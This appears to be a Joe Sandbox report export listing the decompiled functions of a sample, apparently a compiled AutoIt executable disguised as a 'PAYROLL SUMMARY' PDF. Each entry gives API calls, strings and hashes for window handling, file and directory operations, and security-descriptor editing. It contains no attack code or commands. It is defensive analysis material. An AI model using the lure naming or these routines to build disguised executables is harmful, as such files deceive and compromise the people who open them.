__wcsnicmp.LIBCMT ref: 002AB23F

Strings

CLASSNAME=, xrefs: 002AB27C
[HANDLE:, xrefs: 002AB24B
[CLASS:, xrefs: 002AB28F
HANDLE=, xrefs: 002AB238
ACTIVE, xrefs: 002AB21A
[REGEXPTITLE:, xrefs: 002AB267
REGEXP=, xrefs: 002AB254
[ACTIVE, xrefs: 002AB22C
[ALL, xrefs: 002AB2E5
ALL, xrefs: 002AB2D3
LAST, xrefs: 002AB204
[LAST, xrefs: 002AB2EC

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: eff6b0c3de63ec115d574b64c4e330d30f53c40a5fc68dee358f62f5fa9fd6fb
Instruction ID: 398286b50348ddc78b0a71acb6184ce25bffed6b77e6167d028225e3a6bcea53
Opcode Fuzzy Hash: eff6b0c3de63ec115d574b64c4e330d30f53c40a5fc68dee358f62f5fa9fd6fb
Instruction Fuzzy Hash: 6F31F031A64209A6DB12FA60DC63FEE77A89F25711F600026F805710D3EFB26E28C955

Function 002AC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 002AC4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002AC4E6
SetWindowTextW.USER32(?,?), ref: 002AC4FD
GetDlgItem.USER32(?,000003EA), ref: 002AC512
SetWindowTextW.USER32(00000000,?), ref: 002AC518
GetDlgItem.USER32(?,000003E9), ref: 002AC528
SetWindowTextW.USER32(00000000,?), ref: 002AC52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002AC54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 002AC569
GetWindowRect.USER32(?,?), ref: 002AC572
SetWindowTextW.USER32(?,?), ref: 002AC5DD
GetDesktopWindow.USER32 ref: 002AC5E3
GetWindowRect.USER32(00000000), ref: 002AC5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 002AC636
GetClientRect.USER32(?,?), ref: 002AC643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 002AC668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 002AC693

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: eb72e017ac9dbd770709a95e0f6ccb3568207accb7fb3e1a9991e82639209668
Instruction ID: 8669e10c68a8d2ff94ba9c4257c968ba757cfb73b13219fef85068e575097147
Opcode Fuzzy Hash: eb72e017ac9dbd770709a95e0f6ccb3568207accb7fb3e1a9991e82639209668
Instruction Fuzzy Hash: 22516070D00709AFDB20DFA8DE89B6EBBF9FF04704F104529E692A25A0DB74E914CB54

Function 002DA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002DA4C8
DestroyWindow.USER32(?,?), ref: 002DA542

Part of subcall function 00257D2C: _memmove.LIBCMT ref: 00257D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002DA5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002DA5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002DA5F1
DestroyWindow.USER32(00000000), ref: 002DA613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00250000,00000000), ref: 002DA64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002DA663
GetDesktopWindow.USER32 ref: 002DA67C
GetWindowRect.USER32(00000000), ref: 002DA683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002DA69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002DA6B3

Part of subcall function 002525DB: GetWindowLongW.USER32(?,000000EB), ref: 002525EC

Strings

tooltips_class32, xrefs: 002DA5B5, 002DA643
0, xrefs: 002DA4DE

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: f2ef1db47d899478773879b0a21566f7035aaac302aec013a07e1af1d2bc70c8
Instruction ID: 65a2855b0a6116243fc71c783a4ca1bb60e77f56bb80f1b429dd5e3f25139a37
Opcode Fuzzy Hash: f2ef1db47d899478773879b0a21566f7035aaac302aec013a07e1af1d2bc70c8
Instruction Fuzzy Hash: 0E718A71551205AFDB21CF28D849FA677E9EB88300F08492EF996872A0D770ED16CB96

Function 002D4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002D46AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002D46F6

Strings

CHECK, xrefs: 002D4716
SELECT, xrefs: 002D48A7
GETTEXT, xrefs: 002D4849
GETTOTALCOUNT, xrefs: 002D46DD
EXPAND, xrefs: 002D47A8
ISCHECKED, xrefs: 002D4879
GETSELECTED, xrefs: 002D4806
COLLAPSE, xrefs: 002D473C
EXISTS, xrefs: 002D475F
UNCHECK, xrefs: 002D48D2
GETITEMCOUNT, xrefs: 002D47D8

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 8c1ed2a59bf875694f8f05e553b301da995e4d05640115930ee3166ae2cf9395
Instruction ID: 4eb00beb247a4dab93fc4185e8eeb2f6242895c272eb0fcc88b97ec60af9045f
Opcode Fuzzy Hash: 8c1ed2a59bf875694f8f05e553b301da995e4d05640115930ee3166ae2cf9395
Instruction Fuzzy Hash: A6918F34224305DFCB14EF20C891A6AB7A1AF59314F04845EFC965B7A2CB71ED6ACF85

Function 002DBAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002DBB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,002D9431), ref: 002DBBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002DBC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002DBC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002DBC7D
FreeLibrary.KERNEL32(?), ref: 002DBC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002DBC99
DestroyIcon.USER32(?,?,?,?,?,002D9431), ref: 002DBCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 002DBCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 002DBCD1

Part of subcall function 0027313D: __wcsicmp_l.LIBCMT ref: 002731C6

Strings

.icl, xrefs: 002DBAE4
.dll, xrefs: 002DBB27
.exe, xrefs: 002DBB04

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: a055931698f428427983fe7747f99b61d25d441ede441f4eb227968c87b9482a
Instruction ID: 76594e9bb53199060dcb49436fcdaf67cc3e33538aa3c5dd5207a27cd67272f5
Opcode Fuzzy Hash: a055931698f428427983fe7747f99b61d25d441ede441f4eb227968c87b9482a
Instruction Fuzzy Hash: 9E61BD71A20219FEEB15DF64DD45BBA77A8FB08711F108117F815D62C0DBB4AEA4CBA0

Function 002BA0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,002DFB78), ref: 002BA0FC

Part of subcall function 00257F41: _memmove.LIBCMT ref: 00257F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 002BA11E
__swprintf.LIBCMT ref: 002BA177
__swprintf.LIBCMT ref: 002BA190
_wprintf.LIBCMT ref: 002BA246
_wprintf.LIBCMT ref: 002BA264

Strings

"%s" (%d) : ==> %s:, xrefs: 002BA25F
^ ERROR, xrefs: 002BA1E8
Error: , xrefs: 002BA20E
%., xrefs: 002BA0C9
Line %d (File "%s"):, xrefs: 002BA171, 002BA18A
"%s" (%d) : ==> %s:%s%s, xrefs: 002BA241

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%.
API String ID: 311963372-3105223538
Opcode ID: 01ab8918eb1b6e4ee1bf50dfbd7f643831ab0d80b155c618d120f3e8459d28cd
Instruction ID: abbd639db831fe30bee09d092badafea0f8efbde1165c216e8ef293c8b2e78b1
Opcode Fuzzy Hash: 01ab8918eb1b6e4ee1bf50dfbd7f643831ab0d80b155c618d120f3e8459d28cd
Instruction Fuzzy Hash: FA51B131860209ABCF15EBE0DD92EEEB779AF08301F104165F905721A1EB316F69DF51

Function 002BA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00259997: __itow.LIBCMT ref: 002599C2
Part of subcall function 00259997: __swprintf.LIBCMT ref: 00259A0C

CharLowerBuffW.USER32(?,?), ref: 002BA636
GetDriveTypeW.KERNEL32 ref: 002BA683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BA6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BA702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BA730

Part of subcall function 00257D2C: _memmove.LIBCMT ref: 00257D66

Strings

close cd wait, xrefs: 002BA71B
close, xrefs: 002BA63C
closed, xrefs: 002BA64A, 002BA653
open , xrefs: 002BA692
set cd door , xrefs: 002BA6D1
wait, xrefs: 002BA6ED
open, xrefs: 002BA65D
type cdaudio alias cd wait, xrefs: 002BA6AE

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: c22376ecfe79e0c36a860ccc9aeeda8bac145601c5cc5f8b74bf5eb3f12d0959
Instruction ID: d637bfaea3e9eff11e62ea896bb5d029f1d1d110a4aac977b9cc7f8643c27b77
Opcode Fuzzy Hash: c22376ecfe79e0c36a860ccc9aeeda8bac145601c5cc5f8b74bf5eb3f12d0959
Instruction Fuzzy Hash: 6D516A711287099FC700EF20D8918AAB3F4EF94758F14896DF886572A1DB31EE1ACF52

Function 002BA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002BA47A
__swprintf.LIBCMT ref: 002BA49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 002BA4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002BA4FE
_memset.LIBCMT ref: 002BA51D
_wcsncpy.LIBCMT ref: 002BA559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 002BA58E
CloseHandle.KERNEL32(00000000), ref: 002BA599
RemoveDirectoryW.KERNEL32(?), ref: 002BA5A2
CloseHandle.KERNEL32(00000000), ref: 002BA5AC

Strings

\??\%s, xrefs: 002BA496
\, xrefs: 002BA4B2
:, xrefs: 002BA4BD

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 8f8b558cef77844d7c3ee2ff8f13b7bcfd2aff2e5e8cfd0aef6600039be2ea3a
Instruction ID: fe0ab0705b666e3f36d207abe5d4a8dfe60edcc44d3fd4f88c7fbdd9437f244c
Opcode Fuzzy Hash: 8f8b558cef77844d7c3ee2ff8f13b7bcfd2aff2e5e8cfd0aef6600039be2ea3a
Instruction Fuzzy Hash: 3E31D4B591011AABDB21DFA0DC48FEB33BCEF88741F5040B6F909D2160E7709B548B25

Function 002BDB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 002BDC7B
_wcscat.LIBCMT ref: 002BDC93
_wcscat.LIBCMT ref: 002BDCA5
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002BDCBA
SetCurrentDirectoryW.KERNEL32(?), ref: 002BDCCE
GetFileAttributesW.KERNEL32(?), ref: 002BDCE6
SetFileAttributesW.KERNEL32(?,00000000), ref: 002BDD00
SetCurrentDirectoryW.KERNEL32(?), ref: 002BDD12

Strings

*.*, xrefs: 002BDD51

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: a46d151dfacfc7f099b2ae0301dfda36b6d7acc1f1bfd16e50ecc90e8f2538b7
Instruction ID: 7e328396406a0f7f13b5c11815b78f1eb456db7f32666064a68af20441682992
Opcode Fuzzy Hash: a46d151dfacfc7f099b2ae0301dfda36b6d7acc1f1bfd16e50ecc90e8f2538b7
Instruction Fuzzy Hash: A18182765242429FCB64EF24C8459EEB7E8BB88394F19882EF889C7250F770DD54CB52

Function 002DC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002DC4EC
GetFocus.USER32 ref: 002DC4FC
GetDlgCtrlID.USER32(00000000), ref: 002DC507
_memset.LIBCMT ref: 002DC632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 002DC65D
GetMenuItemCount.USER32(?), ref: 002DC67D
GetMenuItemID.USER32(?,00000000), ref: 002DC690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 002DC6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002DC70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002DC744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 002DC779

Strings

0, xrefs: 002DC62A

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 4e18d122b1c1b278de263a6c28bea7543cf63fde0309ec685a06510bb0a77fa7
Instruction ID: 2f01160ae3881f3b69b1081685ff7cb1b298f629575aa4ec10d8cbb6ef4b3645
Opcode Fuzzy Hash: 4e18d122b1c1b278de263a6c28bea7543cf63fde0309ec685a06510bb0a77fa7
Instruction Fuzzy Hash: 53815B706283029FD711CF14D984AABBBE8EB88314F20452EF99597391D770ED25CF92

Function 002A83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002A874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002A8766
Part of subcall function 002A874A: GetLastError.KERNEL32(?,002A822A,?,?,?), ref: 002A8770
Part of subcall function 002A874A: GetProcessHeap.KERNEL32(00000008,?,?,002A822A,?,?,?), ref: 002A877F
Part of subcall function 002A874A: HeapAlloc.KERNEL32(00000000,?,002A822A,?,?,?), ref: 002A8786
Part of subcall function 002A874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002A879D

Part of subcall function 002A87E7: GetProcessHeap.KERNEL32(00000008,002A8240,00000000,00000000,?,002A8240,?), ref: 002A87F3
Part of subcall function 002A87E7: HeapAlloc.KERNEL32(00000000,?,002A8240,?), ref: 002A87FA
Part of subcall function 002A87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002A8240,?), ref: 002A880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002A8458
_memset.LIBCMT ref: 002A846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002A848C
GetLengthSid.ADVAPI32(?), ref: 002A849D
GetAce.ADVAPI32(?,00000000,?), ref: 002A84DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002A84F6
GetLengthSid.ADVAPI32(?), ref: 002A8513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002A8522
HeapAlloc.KERNEL32(00000000), ref: 002A8529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 002A854A
CopySid.ADVAPI32(00000000), ref: 002A8551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002A8582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002A85A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 002A85BC

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 4c8edffb0edc7e5b770a66905a5f4cca2943ed5d1095fcda1a836393c8e7fbde
Instruction ID: 6c2836f7f2fd11e2974f8f9567fc34837ee2a63ea3ba3364514d850e842ad538
Opcode Fuzzy Hash: 4c8edffb0edc7e5b770a66905a5f4cca2943ed5d1095fcda1a836393c8e7fbde
Instruction Fuzzy Hash: 11615B71D1020AABDF04DFA0DD48AAEBBB9FF05301F44812AE915A7291DF309A24CF60

Function 002C762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 002C76A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 002C76AE
CreateCompatibleDC.GDI32(?), ref: 002C76BA
SelectObject.GDI32(00000000,?), ref: 002C76C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 002C771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 002C7757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 002C777B
SelectObject.GDI32(00000006,?), ref: 002C7783
DeleteObject.GDI32(?), ref: 002C778C
DeleteDC.GDI32(00000006), ref: 002C7793
ReleaseDC.USER32(00000000,?), ref: 002C779E

Strings

(, xrefs: 002C7723

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 6a8e1f070dd5169ac5c5ec4025636063550f97038b5a724f48d5f058a7a7b21e
Instruction ID: 8b0da6275a7db81d74cbcc591a1bb76f07bbffb8cdc1aaa50d0c7b8952a0ed09
Opcode Fuzzy Hash: 6a8e1f070dd5169ac5c5ec4025636063550f97038b5a724f48d5f058a7a7b21e
Instruction Fuzzy Hash: DE513875914209EFCB15CFA8DC88EAEBBB9EF48710F14852EE95A97210D631AD508F60

Function 00256BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00270B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00256C6C,?,00008000), ref: 00270BB7

Part of subcall function 002548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002548A1,?,?,002537C0,?), ref: 002548CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00256D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00256E5A

Part of subcall function 002559CD: _wcscpy.LIBCMT ref: 00255A05

Part of subcall function 0027387D: _iswctype.LIBCMT ref: 00273885

Strings

AU3!, xrefs: 00256CC1
Unterminated string, xrefs: 0028EC0D
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0028E84A
Error opening the file, xrefs: 0028E866, 0028E8E1
Bad directive syntax error, xrefs: 0028EBC6
>>>AUTOIT SCRIPT<<<, xrefs: 0028E8BF
EA06, xrefs: 0028E87B

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

